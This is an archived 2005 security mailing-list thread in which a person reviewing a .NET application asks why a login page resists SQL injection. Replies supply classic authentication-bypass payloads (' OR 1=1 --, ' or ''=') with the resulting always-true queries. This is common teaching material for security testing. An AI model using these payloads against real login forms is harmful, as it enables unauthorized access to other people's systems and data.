RE: Simple to exploit SQL Injection ?

["Haaland, Vegar Linge" <Vegar.Linge.Haaland () palantir no>]

 And you could try using:
' or ''='
As username and password. That will make the querry look like:
SELECT * FROM users WHERE username = '' or ''='' AND password = '' or
''=''
(Or anything that always is true;
Some expamples:
You could use: hi' or 'a'='a
This will give you username = 'hi' or 'a'='a'
This will "always" be true (if I real the querry right :P) , cause 'a'
equals 'a'
And so on.

-----Original Message-----
From: Yousef Syed [mailto:yousef.syed () gmail com] 
Sent: 28. november 2005 13:20
To: Jason binger
Cc: webappsec () securityfocus com
Subject: Re: Simple to exploit SQL Injection ?

Hi Jason,
Try the following Password:
' OR 1=1 --

That should give the following SQL:
'SELECT *
FROM users
WHERE username = 'xyz'
AND password = '' OR 1=1 -- '

Since 1 always evaluates to 1, the rest of the SQL will be ignored and
you should get the result you were expecting. Using the "--" comment,
will stop anything else after this from being evaluated. That should
stop you getting any syntax errors.

ys

--
Yousef Syed
"One senior official said the consultancy "doesn't have the greatest of
reputations among civil servants. They come and state the bleeding
obvious using Powerpoint"."

On 28/11/05, Jason binger <cisspstudy () yahoo com> wrote:
> I am reviewing a .Net web application. When entering xyz for a 
> username and ' for a password into a form I receive the following 
> stack trace (extract):
>
> System.Exception: Can't Load DataReader using SQL
> string: 'SELECT * FROM users WHERE username = 'xyz'
> AND password = '''' -- Unclosed quotation mark before the character 
> string '''. Line 1: Incorrect syntax near '''.
>
> Now I would have thought this would be easy to exploit, but I can't 
> bypass the logon page. xyz is a valid username. Any ideas?
>
> Cheers
>
>
>
>
> __________________________________
> Yahoo! Mail - PC Magazine Editors' Choice 2005 http://mail.yahoo.com